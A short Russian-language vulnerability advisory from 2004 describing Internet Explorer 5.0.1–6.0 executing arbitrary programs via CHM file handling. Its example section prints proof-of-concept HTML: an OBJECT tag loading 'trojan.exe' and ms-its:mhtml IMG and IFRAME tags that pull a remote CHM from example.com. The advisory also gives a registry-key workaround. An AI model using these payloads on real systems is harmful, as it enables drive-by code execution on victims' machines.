Автоматическая загрузка и выполнение произвольных фалов в Microsoft Internet Explorer
| Дата публикации: | 24.02.2004 |
| Всего просмотров: | 1548 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Microsoft Internet Explorer 5.0.1-6.0
Описание: Уязвимость обнаружена в Microsoft Internet Explorer при обработке CHM файлов. Удаленный атакующий может автоматически загрузить и выполнить произвольные программы на целевом клиентне. Пример: LAUNCH.HTML: <OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>Чтобы запустить LAUNCH.HTML как CHM файл: <IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'> URL производителя: http://www.Microsoft.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Удалите следующий ключ реестра: HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its |
|
| Ссылки: | Microsoft Internet Explorer Unspecified CHM File Processing Arbitrary Code Execution Vulnerability (bid 9658) |